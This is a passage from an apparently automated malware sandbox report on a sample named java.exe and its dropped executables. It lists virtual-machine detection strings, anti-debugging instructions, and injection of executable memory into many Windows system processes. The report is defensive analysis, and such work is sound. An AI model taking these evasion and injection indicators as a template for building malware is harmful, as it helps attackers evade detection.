            Source: winver.exe, 00000002.00000002.2901295181.0000000002F77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: explorer.exe, 00000003.00000000.1636127493.00000000078A0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
            Source: explorer.exe, 00000003.00000000.1637966604.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00\w
            Source: explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
            Source: explorer.exe, 00000003.00000000.1638532845.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware horizon client*|vm ware8394
            Source: explorer.exe, 00000003.00000002.3041105385.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware vsphere client*|vspe6388
            Source: SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBD5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmware vsphere client
            Source: explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTTAVMWare
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware horizon client*|vdi3894
            Source: SearchApp.exe, 0000000B.00000003.1809228860.0000024B5CBDE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1812027096.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBDE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|hyper-v manager*|hyper v4919
            Source: explorer.exe, 00000003.00000000.1637966604.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBD5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: visual studio code - insidersvmware horizon clientnsidersscode
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware horizon client*|view5503
            Source: svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
            Source: SearchApp.exe, 0000000B.00000003.1809228860.0000024B5CBDE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBDE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|chrome655*|google chrome*|google chrme12854*|hourly analysis program 4.50*|hap1*|google chrome*|gogole chrome12596*|google chrome*|gogle chrome12063*|google chrome*|googe chrome13035*|google chrome*|open google chrome12094*|google chrome*|google chome13148*|google chrome*|goole chrome12691*|google chrome*|google.com6973*|google chrome*|goggle chrome11902*|google chrome*|google chroem12365*|hourly analysis program 4.91*|hap1*|hourly analysis program 5.10*|hap1*|hp scan and capture*|hpscan6530*|hp unified functional testing*|uft1*|ibm integration toolkit 10.0.0.7*|iib403*|hp support assistant*|hps5179*|huawei operation & maintenance system*|lmt1*|ibm integration toolkit 10.0.0.10*|iib1*|hourly analysis program 5.11*|hap114*|ibm integration toolkit 10.0.0.12*|iib1*|hyper-v manager*|hyper v4919*|ibm integration toolkit 10.0.0.15*|iib1*|hourly analysis program 4.90*|hap375*|ibm notes (basic)*|lotus3079*|ibm integration toolkit 10.0.0.11*|iib1*|hourly analysis program 5.01*|hap1*|ic business manager*|icb1577*|idle (python 3.7 64-bit)*|idel5996*|income tax planner workstation*|bna1*|idle (python 3.7 32-bit)*|idel6028*|hpe content manager*|trim1743*|image composite editor*|ice852*|instrument de decupare*|snipp3115*|idle (python gui)*|python idle5336*|import passwords*|lastpass1242*|hourly analysis program 4.80*|hap1*|hyper-v manager*|virtual5441*|i.r.i.s. 
ocr registration*|iris1117*|hp support assistant*|hp ass4184*|hpe unified functional testing*|uft1*|ibm integration toolkit 10.0.0.13*|iib1*|hpe records manager*|trim1399*|internet download manager*|imd6996*|internet explorer*|internet exploreer11386*|internet explorer*|internet expolorer12620*|internet explorer*|enternet explorer12262*|internet download manager*|ine9116*|internet explorer*|interner explorer12898*|integrated operations system*|ios1*|internet download manager*|don8066*|internet explorer*|microsoft explorer11072*|internet explorer*|interent explorer12236*|internet explorer*|inernet explorer12324*|internet download manager*|idman7834*|integrated architecture builder*|iab1*|internet download manager*|idmm8541*|internet explorer*|internet exploerer12012*|internet explorer*|internet explorere10177*|integrated dealer systems - g2*|ids1249*|internet download accelerator*|ida842*|internet download manager*|
            Source: SearchApp.exe, 0000000B.00000000.1766426485.0000024B4402B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007A34000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBnx
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware workstation 12 player*|vmpl5459
            Source: SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBD5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmware workstation 15 playerrecord sound:wux:record soundebi
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|*|vmware6886
            Source: SearchApp.exe, 0000000B.00000003.1812027096.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|hyper-v manager*|vm4595
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware vsphere client*|vcenter5038
            Source: explorer.exe, 00000003.00000002.2901515644.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 00000003.00000002.3032615601.0000000009660000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware horizon client*|vmare7220
            Source: RuntimeBroker.exe, 0000000A.00000000.1738554680.000001ECFA2A4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\Desktop\java.exe | API call chain: ExitProcess graph end node graph_0-3089
            Source: C:\Windows\SysWOW64\winver.exe | API call chain: ExitProcess graph end node graph_2-2570
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | API call chain: ExitProcess graph end node graph_12-5585
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | API call chain: ExitProcess graph end node graph_12-5409
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | API call chain: ExitProcess graph end node graph_12-5895
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | API call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | API call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | API call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\winver.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02260005 rdtsc 0_2_02260005
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_00401000 mov eax, dword ptr fs:[00000030h] 0_2_00401000
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02260C63 mov eax, dword ptr fs:[00000030h] 0_2_02260C63
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_02F00C3F mov eax, dword ptr fs:[00000030h] 2_2_02F00C3F
            Source: C:\Windows\explorer.exe | Code function: 3_2_01380C3F mov eax, dword ptr fs:[00000030h] 3_2_01380C3F
            Source: C:\Windows\explorer.exe | Code function: 3_2_013A0C3F mov eax, dword ptr fs:[00000030h] 3_2_013A0C3F
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC0C3F mov eax, dword ptr fs:[00000030h] 4_2_00AC0C3F
            Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00910C3F mov eax, dword ptr fs:[00000030h] 5_2_00910C3F
            Source: C:\Windows\System32\svchost.exe | Code function: 6_2_009A0C3F mov eax, dword ptr fs:[00000030h] 6_2_009A0C3F
            Source: C:\Windows\System32\ctfmon.exe | Code function: 7_2_00A50C3F mov eax, dword ptr fs:[00000030h] 7_2_00A50C3F
            Source: C:\Windows\System32\svchost.exe | Code function: 8_2_00D40C3F mov eax, dword ptr fs:[00000030h] 8_2_00D40C3F
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: 9_2_00B50C3F mov eax, dword ptr fs:[00000030h] 9_2_00B50C3F
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 10_2_00110C3F mov eax, dword ptr fs:[00000030h] 10_2_00110C3F
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: 12_2_001C0C3F mov eax, dword ptr fs:[00000030h] 12_2_001C0C3F
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: 12_2_02380C63 mov eax, dword ptr fs:[00000030h] 12_2_02380C63
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 15_2_00AB0C3F mov eax, dword ptr fs:[00000030h] 15_2_00AB0C3F
            Source: C:\Windows\System32\smartscreen.exe | Code function: 16_2_00290C3F mov eax, dword ptr fs:[00000030h] 16_2_00290C3F
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: 17_2_001C0C3F mov eax, dword ptr fs:[00000030h] 17_2_001C0C3F
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: 17_2_023A0C63 mov eax, dword ptr fs:[00000030h] 17_2_023A0C63
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe | Code function: 19_2_00580C3F mov eax, dword ptr fs:[00000030h] 19_2_00580C3F
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 20_2_003D0C3F mov eax, dword ptr fs:[00000030h] 20_2_003D0C3F
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 23_2_00900C3F mov eax, dword ptr fs:[00000030h] 23_2_00900C3F
            Source: C:\Windows\System32\ApplicationFrameHost.exe | Code function: 24_2_00180C3F mov eax, dword ptr fs:[00000030h] 24_2_00180C3F
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 26_2_00190C3F mov eax, dword ptr fs:[00000030h] 26_2_00190C3F
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exe | Code function: 28_2_00010C3F mov eax, dword ptr fs:[00000030h] 28_2_00010C3F
            Source: C:\Windows\System32\svchost.exe | Code function: 29_2_00220C3F mov eax, dword ptr fs:[00000030h] 29_2_00220C3F
            Source: C:\Windows\System32\dllhost.exe | Code function: 30_2_006E0C3F mov eax, dword ptr fs:[00000030h] 30_2_006E0C3F
            Source: C:\Windows\System32\conhost.exe | Code function: 31_2_00E60C3F mov eax, dword ptr fs:[00000030h] 31_2_00E60C3F
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 32_2_00940C3F mov eax, dword ptr fs:[00000030h] 32_2_00940C3F
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 34_2_00B00C3F mov eax, dword ptr fs:[00000030h] 34_2_00B00C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 35_2_02860C3F mov eax, dword ptr fs:[00000030h] 35_2_02860C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 36_2_02BB0C3F mov eax, dword ptr fs:[00000030h] 36_2_02BB0C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 37_2_02560C3F mov eax, dword ptr fs:[00000030h] 37_2_02560C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 38_2_02610C3F mov eax, dword ptr fs:[00000030h] 38_2_02610C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 39_2_02520C3F mov eax, dword ptr fs:[00000030h] 39_2_02520C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 40_2_02B20C3F mov eax, dword ptr fs:[00000030h] 40_2_02B20C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 41_2_01450C3F mov eax, dword ptr fs:[00000030h] 41_2_01450C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 42_2_02620C3F mov eax, dword ptr fs:[00000030h] 42_2_02620C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 43_2_00EE0C3F mov eax, dword ptr fs:[00000030h] 43_2_00EE0C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 44_2_02D30C3F mov eax, dword ptr fs:[00000030h] 44_2_02D30C3F

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\explorer.exe base: 13A0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\sihost.exe base: AC0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 910000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 9A0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: A50000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\explorer.exe base: 1380000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\svchost.exe base: D40000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 110000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: AB0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: 290000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 900000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 180000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 190000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 220000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 6E0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\conhost.exe base: E60000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 940000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\backgroundTaskHost.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: B00000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2860000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2BB0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2560000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2610000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2520000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2B20000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1450000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2620000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: EE0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2D30000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: E40000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 920000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: E40000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 23C0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 10B0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2790000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: A50000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2510000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: CE0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 640000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 8E0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1040000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: F90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: A90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2350000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 29B0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1190000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 27F0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2EF0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 28D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: B90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2B70000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2BD0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1170000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 940000 protect: page execute and read and write
